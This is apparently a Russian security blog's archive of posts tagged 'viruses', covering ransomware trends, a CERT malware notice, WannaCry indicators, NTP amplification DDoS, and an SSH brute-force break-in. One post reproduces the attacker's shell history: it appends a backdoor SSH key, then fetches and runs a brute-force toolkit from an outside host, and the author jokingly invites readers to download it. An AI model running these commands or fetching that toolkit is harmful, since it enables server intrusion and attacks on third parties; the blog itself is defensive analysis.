Записи с меткой «вирусы»

Тема троянов-шифровальщиков, вымогающих деньги за расшифровку пользовательских данных, никуда не делась, а лишь развивается и обрастает новыми техниками. Мои читатели наверняка помнят, что я сторонник качественных и изначально качественно настроенных систем, к которым виндовсы явно не относятся. Их крайне небезопасные дефолтные настройки, принятые как компромис совместимости ещё в конце 90-х/начале нулевых, так и продолжают оставаться источником больших проблем до сих пор, хотя часть их и была пофиксена.

Злоумышленники этим вовсю пользуются. Однако злодеи тоже весьма ленивы, и хотят максимум прибыли при минимуме затрат.
Но что делать, когда старый вредонос хоть и держит жертв крепко за яйки, но давно палится кем только можно, а новый и денег стоит, да и вообще неизвестная неведомая штука ? И кибер-негодяи наши потрясающее решение:

Sophos:: Ragnar Locker deploy VM to dodge security

Правильно, если у клиента есть комп с виндовс, и там есть антивирус, то надо втащить заражённому клиенту не просто троян, а целую виртуальную машину с трояном, внутри которой никакого антивируса не будет !

Схема атаки получается примерно такая:

RagnarLocker from-VM Attack scheme

Конечно, для такой радости нужны толстые каналы — придется совокупно скачать под 400 Мб данных — 120 Мб весит виртуалка и 280 образ системы. То есть при запуске дроппер делает такую вещь — ищет VirtualBox, если не находит — ставит его (причём очень древнюю перепакованную версию 3.x), скачивает образ протрояненной ВМ, содержащий очень урезанный Windows-XP-Micro, гостевые аддоны и собственно троян, в настройках этой ВМ подключает как доступные на запись каталоги все диски локального хоста (разделы с данными, сетевые диски, флешки). Дальше ВМ запускается в фоне без интерфейса с помощью VBoxHeadless и запущенный внутри неё троян сразу начинает шифровать всё интересное из подключенных снаружи дисков через механизм «Общих папок». Соответственно, всему ценному на таком хакнутом хосте наступает полный рубидий.

Базовая мера защиты — отключение работы под админом и работа с правами обычного пользователя — уже почти полностью исключила бы такой сценарий. Как минимум, никаких сносов точек восстановления и установки софтин, особенно древних версий. Даже локальный бэкап, но делаемый по уму отдельным юзером, и то был бы в этом случае в безопасности.

Так что следует быть крайне внимательным ко всему исполняемому, что может запуститься на машине — будь то программы, скрипты или даже внедрённый код каких-нибудь макросов, которые тоже тут недавно воскресли из небытия.

Делайте бэкапы, используйте адекватные реалиям и нормально настроенные системы.

… и получил поддержку нескольких ключей без траты очков ДНК !

Вирусы-шифровальщики продолжают активно развиваться.
Буквально вчера я писал о зафиксированном случае двойного проникновения криптования.

Оказалось, что там всё несколько интереснее.

Жертва, потеряв доступ к своим файлам в результате атаки вируса, начинает судорожно искать решения в интернетах, и может найти такие странные программы, которые обещают просканить зашифрованные файлы и попытаться помочь с расшифровкой или поиском решения.

Авторы таких поделий активно косят под антивирусных «экшпертофф».
На практике же в самом наилучшем случае прога просто будет симулировать работу и рекламировать контакты посредников, в худшем — закриптует ваши файлы ещё раз, возможно, необратимо их испортив.

Так что если вас накрыло вирусом-шифровальщиком, это не повод расслабляться, и всякие такие сторонние софтины если уж и запускать — то исключительно в отдельной виртуальной машине, иначе можно пострадать ещё сильнее и глубже.

О второй интересной фиче тоже сообщили завсегдатаи антивирусных форумов. Раньше было как — взаимодействие с кибервымогателем шло по схеме «всё или ничего». Либо нет ключа, и поциент сосёт йух, либо ключ есть, и он таки расшифровывает все свои файлы. То есть дифференциация была только между компами. Заразился соседний комп в локалке — отдельный ключ, отдельный выкуп. Теперь же новая супер-модная тенденция — дифференцировать ключи по типам файлов.

Попав на машину, вирус генерит в пределах оной машины (то есть на одно заражение) несколько разных ключей под разные задачи. Хотите расшифровать офисные файлы — купите один ключик, говно-базы говно-данных (файловые 1С, аццесс) — купите ещё один ключик, за фотографии — купите третий ключик. Число ключей и вариантов ограничено только фантазией злоумышленника.
По случаю годовщины ограбления крупного банка возможна скидка — каждый 4-й ключ бесплатно =]

Совокупная стоимость владения виндовс начинает расти угрожающими темпами. Не надейтесь на антивирусы, учитесь делать бэкапы.

Думаете, вирусы-шифровальщики давно ушли, оставшись в прошлом ?
А вот и нет. Они научились работать последовательно, причиняя двойной дамаг файлам, нервам, и кошельку.

Нашел пример особо эпического попадоса :

>> Зашифрованы файлы рабочего стола и расшаренной папки.
>> Названия стали типа График отпусков.xls[graff_de_malfet@protonmail.ch][
>> ].fjh.id-7ED6683D.[magicswordhero@aol.com].msh

здесь было двойное шифрование, вначале идет шифрование [graff_de_malfet@protonmail.ch][].fjh скорее всего Cryakl CS 1.8,

затем id-7ED6683D.[magicswordhero@aol.com].msh — это уже шифрование в Crysis.

судя по маркеру в зашифрованном файле 00000000020000000CFE7A410000000000000000000000002000000000000000

это действительно Crysis #Dharma

Оба криптовальщика используют стойкие реализации, так что тут либо нормальные бэкапы (а не та суррогатная муйня, когда бэкапные сервера глубоко введены в ту же уязвимую AD-инфраструктуру, что и всё остальное), либо платить два жирных выкупа негодяям и молиться, чтобы совокупная стоимость владения виндовс не выросла ещё больше в обоих случаях не кинули с ключами, что регулярно случается.

Недавно одному клиенту вышележащий провайдер переслал одно интересное абузное письмо.

От: GOV-CERT.RU
Тема: Уведомление о зараженной ВПО ПЭВМ – [GOV-CERT.RU#]

Добрый день!

НКЦКИ располагает подтвержденными сведениями о внедрении ВПО типа
Trojan-Banker.Win32.RTM на объект, находящийся в адресном пространстве
вашей компании.

В период с 11 июня по 18 июля зафиксированы факты взаимодействия
представленного во вложении IP-адреса с центром удаленного управления
(C&C). Для получения IP-адресов C&C ВПО осуществляет запрос по адресу
hxxps://chain[.]so/api/v2/get_tx_received/BTC/ (IP-адреса 104.25.48.99,
104.25.47.99). В ответе содержится набор транзакций на счет криптокошелька.

Просим довести данные сведения до владельца указанного объекта для
принятия мер по реагированию на компьютерный инцидент.

О проведенных мероприятиях просим проинформировать.

С уважением,
Команда Национального координационного центра по компьютерным инцидентам
Сайт — http://cert.gov.ru/
Почта — gov-cert@gov-cert.ru
Телефон: +7 (916) 901-07-42

Chain.so — это вообще-то эксплорер по самым распространённым криптовалютам.
Конечно, там мог притулиться и C&C, но это совсем уж наглость, размещать C&C
на публичном проекте.

Современные трояны много чего умеют,
но зачем банкеру лазить в блокчейн — не очень понятно.
Такое поведение больше характерно для вирусов-шифровальщиков.

Тем не менее, gov-cert считает эту активность 100% относящейся к банковскому трояну
Trojan-Banker.Win32.RTM.

Обычно подобные письма раньше присылали всякие иностранные секурити-конторы
или автоматизированные IDS-системы. Оказывается, в России тоже создан такой центр,
и судя по письмам — даже начал заниматься чем-то внятным.

Сам троян Trojan-Banker.Win32.RTM тоже весьма интересен:

Троянец-банкер Arnold: TwoBee или не TwoBee

Его ключевая идея — подмена реквизитов для безналичной оплаты в файле обмена данными между банк-клиентом и 1С.
Дело в том, что при большом потоке документов на оплату интеграция банка и 1С обычно настраивается один раз классическим методом через текстовый файлик обмена данными, и забывается надолго. И вот этот вирус как раз таки мониторит обращения к этому файлу, и вместо реквизитов компании-получателя подставляет реквизиты мошенника-однодневки.

Техника весьма изящная и непалевная — с точки зрения банка, просто появляются платежи на новые реквизиты. С точки зрения 1С нечего не меняется — файл переписывается позже и другим процессом. С точки зрения антивируса — всё ок, клиентский софт переписал один-единственный текстовый файлик.

Активность в сторону chain.so выглядит на этом фоне особенно странно. Получается, либо gov-cert ошибся, либо там действительно приютился C&C, либо троян не только пиздит деньги из банк-клиента, но и готовится причинить жертве ещё более серьёзные проблемы. Была мысль, что это анализ именно криптовалютной активности (гэбня роет под юзеров крипты ?!), но для неё нет надёжных подтверждений на текущий момент.
Но есть ещё один весьма логичный вариант — вирусы научились хранить в блокчейне инфу о новом расположении C&C ! Это весьма новая техника для обеспечения доступности C&C, и если это так — мне крайне любопытно получить подтверждение этому, это мощное и очень красивое решение.

Вообще Gov-CERT создан для защиты государственных IT-систем ещё в 2012-м, и курирует его ФСБ.

Тем удивительнее было обнаружить, что они не ограничились защитой только госов и своей внутренней кухней, но и начали участвовать в информировании пострадавших о заражениях.
При этом они смогли избежать тёмного соблазна использовать всякие крипто-про и отечественную крипту в паблике — как и все нормальные cert-ы, используют для подписания писем PGP-ключ с вот таким iD: 4D72 E5BD EA7F 046E 6C33 FB86 B6B8 3E23 25D8 A13B , который выложен у них в контактах.

Что и разумно — гостайной и персданными инфа о червиях не является, а использовать устоявшиеся стандарты для защиты почты более чем логично.

Но само событие более чем любопытное, на него стоит обратить внимание — гос-CERT шлёт письмо провайдеру, что у него есть заражённый банковским трояном клиент, но в качестве примера активности указываются коннекты к блокчейн-эксплореру.

Вот такая вот странная фигня случилась. Если узнаю ещё чего интересное — добавлю в заметку.

Всем привет. Сегодня мы поговорим о безопасности WINE и важности изоляции вайн-префиксов.
(далее…)

Буквально недавно только успел пошутить про пришельцев, как их инопланетный десант уже тут как тут.
Вчера произошла массовая активация червия, созданного с использованием утёкших американских эксплоитов. Патч был выпущен ещё в марте, но поскольку далеко не все виндовс-системы вовремя обновляются (микрософт, мы помним принудительные перетаскивания на виндовс-10, и поэтому не готовы слепо и огульно ругать тех, кто отключил таки виндовс-апдуте), зараза отработала относительно(!) редко, но зело метко.
Десятки стран, провайдеры, британские больницы, МВД РФ, РЖД, Мегафон, Deutsche Bahn. Судя по некоторым обсуждениям, виндовс-апдуте тоже спасает не всегда, требуется ручное вмешательство.

Даже по радио обсуждали злосчастную вирусню. Британские уч0ные журналисты тоже разразились большой статейкой, тряхнуло многих.
Из особо занятного:

* Поскольку выкуп требуется биткойнами, а биткойн псевдонимен, но не анонимен, то мы не может сказать по номеру аккаунта, кто именно получает профит, но можем точно сказать, сколько именно профита перечислили жертвы:
https://blockchain.info/address/13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
https://blockchain.info/address/12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
https://blockchain.info/address/115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
На 2017-05-14 0:30 там скопилось около 15  BTC совокупно, что по текущему курсу составляет 25 000 вечнозеленых.

* В шифровальщике была добавлена возможность стопнуть текущую эпидемию, но завязана она была только на регистрацию «секретного» домена с кривым длинным именем, чем и воспользовался один хороший человек. А вот остановятся ли атаки — зависит только от оперативности виндовс-админов и жадности разработчика червия. Мне почему-то кажется, что 15 биткойнов ему будет мало…

Чую, в понедельник узнаем много нового.

P.S. Понедельника дожидаться не пришлось. Первый серьёзный анализ есть:
https://habrahabr.ru/company/pentestit/blog/328606/
Цитирую самое смачное:

В данный момент существуют минимум три ветки шифровальщика: фишинговая (первая), киллсвитч (первая волна), без киллсвитчера (выпущенная буквально несколько часов назад).

Как и предполагалось, возможность погасить эпидемию простой регистрацией домена вирусописатели пофиксили, как только проснулись.
У вредоноса целых 5 скрытых тор-сервисов для управления:

  • gx7ekbenv2riucmf.onion
  • 57g7spgrzlojinas.onion
  • xxlvbrloxvriy2c5.onion
  • 76jdd2ir2embyv47.onion
  • cwwnhwhlz52maqm7.onion

Автор червия по-прежнему неизвестен, и пока нет даже намёков, журналистам нет смысла верить =).

Ну и особо радостная мякотка во внутренностях вирусни:

После заражения системы шифровальщик сканирует локальную сеть для поиска других уязвимых хостов, а также сканирует случайные диапазоны сети Интернет.

Минимальное время заражения системы после выставления в интернет 445 портом — 3 минуты.

Так что море радости ещё впереди, скучно точно не будет, особенно когда в фирмах, фирмочках и фирмищщах повключают компы в понедельник.
А вот и ОЧЕНЬ приятные сведения:

Попытка скрыть свое присутствие или идентифицировать среду исполнения сегодня классифицируется как критичный IOC (index of compromise, индекс вредоносности). Соответственно, мы наблюдаем тренд, когда вредоносные программы стараются не выделяться из общего потока легитимной активности таких программ, как инсталляторы, архиваторы, менеджеры файлов.

Из этого есть один классный вывод — говнодевелоперы кривых защит, любители обфускации кода и кривых хаков в пользовательской системе для всякого говнософта получают тухлой селёдкой по мордам.

Начну с одной относительно малоизвестной цитаты.
«Вообще сама идея нажимать кнопки в том же самом месте, где должны появляться буквы (на экране) — нищебродна чуть более, чем полностью. На мой взгляд, совмещать устройство ввода и вывода — это как заваривать чай в унитазе.»

Это в качестве вступительной шутки.

(далее…)

Bruteforce-Bot

Posted: 2016-01-27 in IT, Security
Метки:, ,

Настраивая свою впс-ку, один клиент поставил слабый пароль на одну из учёток.

Что произошло дальше ?
Боты нащупали слабый пароль:
Accepted password for teamspeak from 185.56.80.177 port 60850 ssh2

зашли по SSH под логином teamspeak, и дальше сделали простую вещь:

$ cat /home/teamspeak/.bash_history

mkdir .ssh
cd .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAnhdLIoPB1q8Tn2LUsH7edJG7XwaJJ6cjmo3s+GRi\
ViLvNQIHl016+XIUVAL3Y/R5Irhxif88nymSBHgqBdmXtoNxNsdn6PBAPMH9Vx5XJ8Tc\
ELZQ9VW9Q4HfXptrP8Pm+LIya8pn6qhxtFnF3J5fGpfjnWhK3D439rq84l\
ygavU= Master IcS has arrived" >> authorized_keys
chmod 700 ~/.ssh;chmod 600 ~/.ssh/authorized_keys
passwd
php -v
sendmail
php -v
cd .ssh
ls
wget csmioveni.tripod.com//sshd.tgz
tar xvf sshd.tgz
cd .vmware-root/
ls
./start 213
ls

Обломившись с рутом и отсутствием php, херакеры решили немного с этой машины побрутить чужие сервера.

Пос0ны, налетай на csmioveni.tripod.com//sshd.tgz , к0чай прЕватные брутф0рсеры =)
В архиве оказался каталог .vmware-root, в нём — пара скомпиленных бинарей для брутфорса других серверов, словарик паролей и логинов.

Так что настраивая сервер, лучше сразу ставить нормальные пароли и делать авторизацию по ключам.

Проходя мимо чумного поселения, обнаружил нездоровое бурление и шум. Оказалось, что относительно недавно появившийся новый вирус-криптовальщик, дописывающий расширение .BREAKING_BAD, устроил настоящую бурю у хомячков на файловозках.

Предположу, что злодеи стали применять такую тактику — сперва (пока тушка не палится антивирями совсем) делаются целевые рассылки наиболее вкусным клиентам — бухгалтерам, менеджерам, директорам, технологам и прочему труЪ-ентерпрайзу с кучей ценных файлов и достаточным уровнем нищебродства, чтобы сэкономить на зарплате нормальному админу. Когда же тушка успеет несколько скиснуть, начнёт более-менее сносно палиться на вирус-тотале и потеряет свою исходную пробивную мощь — делается массовая рассылка всем остальным, у кого системы совсем уж непотребно дырявые. Конечно, 90-95% второй волны будет убито ещё на подлёте антиспамом/серверным кламавом/прочим, но и оставшихся жертв хватит — аудитория тут уже не целевая, бьют по площадям, в кого-нибудь да попадёт. И похоже, что попадает.

Хомяки, сильно офигевшие от такой «отаке», валом повалили на форумы аверов. Ну а поскольку понимания сути — ноль, форумы завалило потоком флуда типа «готов купить лицензию на антивирь, но только с ГАРАНТИЯМИ!!11! расшифровки на 100500%», «а давайте вы нахаляву и без смс сделайте супер-универсальный-мега-декриптор, сложно вам что ли», «почему антивирь 8-и летней давности не защитил мою Вин-ХП-СП2 с 6-м ИЕ, за_что_мы_деньги_платим ??!» и тому подобной смешной бредятины.

Видимо, сильно утомившись от общения с нищебродами, Паутинычи сделали ход конём:

Компания «Доктор Веб» сообщает об изменении условий предоставления бесплатных услуг технической поддержки пользователям Dr.Web, пострадавшим от действий троянцев-шифровальщиков семейства Trojan.Encoder. Теперь получить поддержку можно только обладая на момент заражения активной коммерческой лицензией Dr.Web, с установленным продуктом Dr.Web Security Space или Антивирус Dr.Web для Windows не ниже версии 9.0 или Dr.Web Enterprise Security Suite (версии 6+).

Решение спорное: всё-таки расшифровка похеренных шифровальщиками файлов — весомый аргумент выбрать продукт в будущем, пусть даже расшифровка возможна не всегда.

С другой стороны — шифрование становится всё крепче, вирусописатели учатся на своих ошибках, и у авера эта возня стала отнимать слишком уже много сил. Как я смог выцепить из форума Паутиныча — они раздобыли мощный вычислительный кластер (хз, построили, арендовали или получили доступ по благотворительности) и сократили время многих операций с недель и месяцев до нескольких часов. Также смогли найти весьма крутых спецов, способных делать криптоанализ и местами даже успешно. Насколько это круто ? Это неимоверно круто. Спецы по такому криптоанализу уникальны даже в масштабах мира, и каждый такой кадр (жуткий гибрид хакера-реверсера и узкоспециализированного математика-криптографа) реально на вес золота. Однако современное стойкое крипто не по зубам даже им, времени на анализ всё равно уходит масса, хомячки всё равно недовольны и грозятся «сменить антивирус и не купить лицензию». И даже случаи успешных расшифровок их не утешают и ничему не учат.

Итог — всех нищебродов за борт. Не купил антивирь заранее, сэкономил 200 рублей на болванки для бэкапа фоток, сэкономил на зарплате админу и серверах для бэкапа — вот сиди и набивай данные заново, нефиг флудить на форумах. И никого не ебёт, что завтра крайний срок сдачи годовой отчётности!

Видимо, поток жертв стал таким огромным, а разбор чужих конюшен настолько непродуктивным, что Паутинычи решили усилия своих квалифицированных спецов направить только на работу с теми, у кого шансов несколько больше — то есть у кого стоял их продукт ДО факта заражения. И я уверен, что объехать их будет трудно.

Ну и в завершение — немного юмористических рассказов, как использование виндовс снижает совокупную стоимость владения, особенно в домашнем секторе и малом / среднем бизнесе. На фоне выкупов в 20-50-100 биткойнов с компа очень прикольненько читать.

Как и предсказывалось, злоумышленники шифрованием баз 1С и офисных документов не ограничились. Если не следить за своими паролями, использовать старый мохнатый софт и админить свои системы с чужих завирусованных машин, то даже самый супер-сервер с последней OpenBSD может быть подвергнут грязным надругательствам.

Сценарий такой атаки давно не новость, и предупреждали про него 100500 раз, да и бэкапы все уже давно вроде бы должны были научиться делать. Решил прикола ради посмотреть, что творится в заморских кущах форума Касперыча. Напоминаю, что помимо англо- и русскоязычного разделов, там ещё есть разделы для французов, испанцев, итальянцев, японцев и китайцев.

К сожалению для моих читателей, мои навыки в гуманитарных науках и языках не столь сильны, так что цитат иероглифами не будет.

http://forum.kaspersky.com/index.php?showtopic=332205&pid=2497453&st=0&#entry2497453
У товарища оказались зашифрованы файлы на сайте, размещенном на хостинге.
Есть всего два наиболее вероятных пути проникновения на такой сервер:

— либо проёбанные пароли (на админьте свои сайты из Putty/WinSCP с инфицированных виндофс-машин, не раздавайте шеллы хостинга кому попало)
— либо очень мохнатые версии CMS, дырявые скрипты и уязвимые модули.

Судя по ответам, наиболее вероятен второй сценарий. Отмечу, что встроенные системные средства защиты сработали: изоляция каждого демона под отдельным пользователем не позволила злоумышленникам, проэксплойтившим уязвимую CMS, испортить файлы где-либо вне сайта, вмешаться в работу других сайтов, испортить базу данных или повредить бэкапы. Однако не стоит забывать, что после получения доступа на никсовый сервер наворотить там деструкции (хоть и в жестких рамках полученных пермишенов обычного пользователя) можно гораздо легче — предустановленные OpenSSL, gpg2, да и более тривиальные cat и dd в злых руках опасного скриптописца способны устроить серьёзный погром на сервере. Правда, и все необходимые средства защиты тоже присутствуют =)

А остальное скучное — трояны, криптолокеры, спам-боты, рекламно-шпионский софт и прочие «кардинально меняющие стоимость владения» преимущества из иммуннодефицитного мира виндовс-систем.

2015-11-08 UPD. секулаб очнулся от спячки, и сообщает, что пострадавшие уже не единичны:
http://www.securitylab.ru/news/476582.php
Конечно, нельзя исключать и зело коварных 0day-уязвимостей, но есть у меня ощущение, что 90% таких случаев приходится на стыренные пароли из виндовс-систем незадачливых сайто-одминов, а оставшиеся 10% — на дыры в CMS и изначально слабые пароли.

VAULT вернулся.

Posted: 2015-10-29 in IT, Security
Метки:

После небольшого затишья вернулся шифрующий троян ваулт. Ко мне обратился пострадавший клиент, у которого ваулт вынес вперёд ногами все документы в бухгалтерии.

Занос обратно стоил денег. Мошенники выяснили, что далеко не все пострадавшие клиенты способны самостоятельно купить биткоины и заплатить выкуп на onion-сайте. Так что опасения Минфина насчёт повальной биткоинизации населения совершенно беспочвенны 😀 😀

Чтобы не терять свой бандитский профит, авторы этих шифровальщиков открыли целую пачку фирмочек, которые типа «взломали» ваулт и предлагают расшифровать за меньшие деньги, но уже типа в рамках услуг «компьютерной помощи».

Касперыч обновляет список таких затейников у себя на сайте:

http://forum.kaspersky.com/index.php?showtopic=331258

При этом такие фирмы реально присылают договор на оказание услуг «компьютерной помощи», всё оформляется по бухгалтерии, клиенту вроде даже расшифровывают данные.

Логика тут ясна — пострадавшая компания в мире безнала, счетов и накладных чувствует себя более уверенно, чем в мире тора и биткоинов.

Этим и воспользовались. А вот откуда у них ключи от ваулта — это вопрос.

Как я уже писал, есть всего три варианта — либо они в доле с мошенниками, либо нашли дырку в онион-сайте вируса, либо совершили математическое открытие века.
Вероятности реализации всех трёх сценариев фирмой-однодневкой предлагаю оценить самим 😉

Есть такой вирус-шифровальщик — VAULT.
Вот про него немного и напишу.
(далее…)

Узнал тут, что оказывается есть конторы, которые файлы XTBL после вирусной атаки типа расшифровывают. У них даже «гарантии» с синей печатью есть — свидетельства о регистрации в ЕГРЮЛ труЪ-ынтырпрайзной конторы ООО «Рога и Копыта» =).

Это возможно в двух случаях — либо они действуют как посредники, оказывая по сути тех-поддержку в процессе общения с вымогателями, либо сами как-то в доле, участвовали в разработке или связаны с разработчиками исходного трояна. В любом случае, халявы не ожидается.

Третий вариант — что они взломали стойкое асимметричное крипто — отметаем как слишком уже невероятный. Сервисная контора год от роду, ничем не примечательная, примусы починяющая да ноутбуки от пыли продувающая — и сразу с величайшим математическим открытием в духе Перельмана с Рамануджаном ? Не смешите мои тапочки.

Вирусне такого типа (со стойкой криптографией) уже год. Не ждите универсального расшифровщика — он может появиться только при невероятном стечении обстоятельств! Для этого:
а) должны поймать мошенников (применение тора и биткойна этому не способствует)
б) На момент их предполагаемого ареста должны быть целы мастер-ключи (но отнюдь не обязаны!!).
в) Либо в мире родится совершенно невероятно гениальный математик, чьё имя запишут рядом с Пифагором.

Пишите бэкапы, господа. На DVD/BD-R и прочие носители однократной записи. Фотки из отпуска стоят для вас явно дороже, чем 10-20 или даже 200 рублей за болванку. Админам — не спать!! На антивирусы не надеяться, только эшелонированные бэкапы могут спасти ваши данные!

Из нового: вирусы-шифровальщики такого типа не только научились убивать точки восстановления, но и при наличии доступа сеять хаос и разрушения в облачных хранилищах — есть случаи разрушения данных на Яндекс-Диске и в уязвимых NAS от Synology.

Для PGP, RSA и ECDSA способов взлома может не появиться ВООБЩЕ. Совсем. Грубой силой это тоже не ломается, никакой закон Мура и прогресс в микроэлектронике длину шифров не передавят, так что никакой брутфорс на суперкомпьютере тут тоже не светит. А прорывные открытия в математике (в частности, в теории чисел) могут в этом тысячелетии и не случиться.

Всех призываю К ПРАВИЛЬНЫМ БЭКАПАМ.

P.S. немного тегов для роботов:
xtbl как расшифровать
xtbl дешифратор скачать без смс 😀 😀
ctb locker как расшифровать
ctb locker дешифратор скачать без смс 😀 😀

Вирусы-шифровальщики таки офигенны. С момента последней заметки на эту тему ( https://aminux.wordpress.com/2015/01/19/virus-encoder-end-faq/ ) прошло несколько месяцев, а развитие данных типов угроз заметно невооруженным взглядом.
(далее…)

В данной заметке я расскажу немного занятных фактов про такой тип угроз, как вирусы-шифровальщики.
Если вам это интересно, прошу под кат.
(далее…)

Amplified DDoS

Posted: 2014-12-03 in IT
Метки:

Нашёл статейку о коэффициентах усилия DDoS-атак, порождаемых злонамеренным использованием ряда сетевых протоколов:
https://www.us-cert.gov/ncas/alerts/TA14-017A

Сама табличка:

Protocol Bandwidth Amplification Factor Vulnerable Command
DNS 28 to 54 see: TA13-088A [1]
NTP 556.9 see: TA14-013A [2]
SNMPv2 6.3 GetBulk request
NetBIOS 3.8 Name resolution
SSDP 30.8 SEARCH request
CharGEN 358.8 Character generation request
QOTD 140.3 Quote request
BitTorrent 3.8 File search
Kad 16.3 Peer list exchange
Quake Network Protocol 63.9 Server info exchange
Steam Protocol 5.5 Server info exchange

Суть усиления в том, что некоторые сетевые протоколы, работающие без установления соединения, порождают ответ существенно большей длины, чем запрос.
Наиболее рзарушителен в этом плане протокол NTP (синхронизация времени). Старые версии содержат такую функцию — получить список пиров, с кем был синк за последние 5 минут. Опасность в том, что длина ответа в полтыщщи раз превышает длину запроса. Ситуация усугублена тем, что а) проверка SourceIP применяется далеко не во всех провайдерских сетях и б) полностарых версий ntpd, висящих на всяких китайских камерах, ТВ-приставках и прочем подобном железе.

Распишу пример. Пусть у нас есть провайдер Roga-&-Копыта-Мудем-фоReVa-шЫз с сеткой 16.55.16.0/17, не фильтрующий траффик по Source IP (коих овер дофига).
И есть уязвимые ntpd на адресах 108.188.45.46, 109.1.1.2 и 110.2.2.3
Целевой сайт — microsoft.com (адреса 134.170.185.46 и 134.170.188.221).

Абоненты из 16.55.16.0/17 в этом случае могут слать UDP-пакеты на порт 123 с DST-IP из (108.188.45.46, 109.1.1.2, 110.2.2.3) и с SourceIP из (134.170.185.46, 134.170.188.221). За счёт того, что маршрутизация в интернете в основе своей полагается на DstIP, получится такая тема:
— от всего одного инфицированного абонента прилетает по 10 Мбит ntp-флуда на каждый из трех уязвимых нтпд (108.188.45.46, 109.1.1.2 и 110.2.2.3). Провайдеру на это вообщем-то пофиг — 30 Мбит вполне могт быть в рамках тарифа, селективный шейпинг именно нтп-траффика — не самая приятная вещь, для реализации которой нужно либо писать адовы ацл-ки (поперек магистрального канала, ага 😀 :D), либо ставить умные DPI типа Cisco SCE с её изумительным шейпером и ценником из серии «продай квартиру, купи циску».
— сервер ntpd старой версии, получив какие-то жалкие 10 Мбит флуда, честно пытается ответить, причём диск чему дял этого читать не надо. В самом печальном случае (когда ntpd поднят на каком-нить джунипере 😀 ) мощность такого ответа будет уже 5 Гбит/сек!!
— сервер микрософта отгребает 15 Гбит флуда, от которого скорее всего и ляжет копытами кверху. Причем в его статистике будут только SourceIP уязвимых серверов ntpd, и сказать про иницииатора атаки ничего нельзя (во всяком случае, без анализа netflow от провайдера, держащего ntpd).

Гарантированной защиты от такого нет и пока что не предвидится. Самая мощная атака такого типа не так давно положила SpamHouse. Почти терабит/секунду флудящего траффика просадили даже межконтинентальные аплинки, а любой сервис, пытавщийся взять сервис под защиту, огребал конкретно.

Немного расскажу о протоколах.
DNS, NTP, SNMPv2 — часто подняты на всяких домашних роутерах, IP-камерах, ТВ-приставках, IP-телефонах, умных холодильниках и прочем.
NetBIOS и SSDP — виндовс-системы.
CharGEN — очень древний тестовый сервис, но вирусня его часто поднимает на зараженных системах.
QOTD и Kad — хня какая-то неведомая 😀
BitTorrent — надежды только на обновления клиентов и провайдерский шейпинг
Quake Network Protocol и Steam Protocol — игрушки. Коэффициент усиления в 65 — некисло. Но сюда наверное дойдут только тогда, когда большая часть NTP будет обновлена.

Однако учитывая, что разработчики проприетарных говнопрошивок часто даже не начинают чесаться (типа устройство снято с поддержки купите новое железо), а пользователей безопасноть их машин мало волнует — быстрого решения проблемы, скорее всего, не будет.

Против такого DDoS беззащитны 99,99% сайтов. На провайдеров хостинга надеяться тоже не стоит. Отхватив 10-20-200 Гбит флуда, ваш сайт просто выключат, в договоре обязательно найдется пункт насчёт обстоятельств непреодолимой силы и праве хостера выключить любой сервис, угрожающий его инфраструктуре, и никакие угрозы уйти к другому хостеру тоже не помогут. И даже более того — хостер будет только рад сплавить проблемного и флудоопасного клиента своему злейшему конкуренту — чтобы при следующей атаке проблемы заторонули уже не его собственные сети.

Вопреки распространённому мнению, далеко не каждый клиент имеет ценность. Клиент, платящий минимальную сумму, выгоден только тогда, когда не особо ебёт мозг и размещение его сайта не ставит под удар всю инфраструктуру. Защита от DDoS есть, но она дико дорогая, оплачивается почасово, гарантирует защиту только до какого-то предела и позволить себе такое могут лишь очень и очень немногие компании.

Так что защищайте свои системы, обновляйте прошивки и постарайтесь, чтобы вашежелезо не участвовало в чужих атаках.

Залез тут интереса ради в чумной барак на форум Касперского. Как и ожидалось, схема зашифровки ценных пользовательских данных стойкой криптографией и требование выкупа биткойнами оказалась весьма живучей. Кровавые слёзы пострадавших пользователей затапливают форум уже который год, однако злоумышленники так и не пойманы. Более того — они серьезно автоматизировали свои системы скриптами, а один из таких скриптов даже автоматически постит е-мейлы заплативших выкуп в специально отведённый твиттер:
https://twitter.com/keybtc

Наглость, конечно, редкостная.

Записи там лежат с 2014-10-01, и мне стало очень интересно, многие ли заплатили выкуп за свои зашифрованные данные, да и нет ли там каких-либо особо примечательных компаний. Если уже утечка имеет место быть — грех её не поизучать, дабы и самому быть внимательнее, да и коллег предупредить.
(далее…)

Где-то два года назад появилась новая угроза от вредоносного софта — шифрование ценных данных пользователей с последующим вымогательством выкупа за предоставление ключей шифрования. Опытные и наиболее дальновидные специалисты уже тогда громко начали увещевать о необходимости эшелонированных бэкапов и пытаться оценить перспективы развития такой вирусни в ближайшем бу1дущем. Что занятно, некоторые наиболее глупые представители общественности даже попытались их заткнуть (типа, не подсказывайте на публичных форумах идеи вирмейкерам), но как и следовало ожидать — прогнозы сбылись самые мрачные.
(далее…)

винлокер жив !

Posted: 2013-06-04 in IT, Security
Метки:

Вирусы семейства Trojan.Winlock, два-три года назад сильно мучавшие домашних пользователей, к настоящему времени резко потеряли популярность. Всё-таки пользователи в основной своей массе научились не платить мошенникам. Но окончательно они никуда не исчезли. …

(далее…)

Evilcode is everywhere

Posted: 2013-02-02 in IT, Security
Метки:

Если вы хотя бы немного интересуетесь практичиской информационной безопасностью, то наверняка читаете какие-либо обзоры по свежим багам, вирусам и прочим напастям, смотрите на имеющиеся средства защиты и изучаете возможности современного софта и железа, которые могут сделать вашу жизнь спокойнее.
Но для построения целостной картины мира в данной области также крайне полезно заглянуть и на тёмную сторону силы. …

(далее…)

Дорогие читатели !
Не без доли сарказма сообщаю вам, что ко всеобщему изумлению и шоку публики, в интернете! внезапно! обнаружили! новый! вирусЪ! Пыщь-пыщь. …

(далее…)